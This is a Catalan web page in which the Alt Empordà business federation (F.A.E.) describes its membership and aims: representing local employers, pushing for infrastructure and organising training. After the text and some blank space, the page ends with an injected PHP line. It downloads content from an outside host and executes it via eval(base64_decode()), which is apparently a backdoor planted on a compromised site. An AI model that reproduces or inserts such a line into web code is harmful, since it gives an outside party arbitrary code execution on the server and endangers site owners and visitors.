Qui Som ?

Els membres de la F.A.E són totes aquelles organitzacions empresarials i professionals, agrupacions, associacions, gremis, unions sectorials o territorials que tinguin capacitat jurídica i caràcter empresarial així com els treballadors/ores autònoms o per compte propi que tinguin treballadors/ores al seu servei i que duguin a terme la seva activitat dins l'àmbit territorial de l'associació.

Finalitat

Els nostres principals objectius són:

La representació, promoció, gestió, informació, assessorament, participació, col·laboració i/o defensa dels legítims interessos dels seus associats (empresaris i autònoms) en qualsevol qüestió, davant les administracions i institucions públiques o privades, d'àmbit comarcal i local i l' opinió pública, amb total respecte a la lliure competència i a les iniciatives pròpies dels seus membres.

• Aportar a l'empresariat de l'Alt Empordà una “veu territorial” en les organitzacions patronals (FOEGFOMENT,CEOE...) que complementi la de caràcter sectorial que cadascún ja disposem.

• Promoure, coordinar i executar tota mena d'activitats que siguin d'interès comú per a tot els seus associats, per la mateixa Federació Altempordanesa d'Empresaris (F.A.E.)

• Promoure polítiques econòmiques i socials que generin un entorn competitiu pel sector empresarial com pot ser el Centre Intermodal del Far-Vilamalla o el Parc Tecnològic de Girona (a ubicar en l' Alt Empordà).

• Intervenir en assumptes d'importància per al desenvolupament de la comarca com traçats de grans infrastructures.

• Exercir davant els poder públics les accions necessàries en interès del sector empresarial.

• Tenir un observatori de les necessitats formatives de les empreses de la comarca i poder gestionar i organitzar accions formatives a Figueres.

 

 
 

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));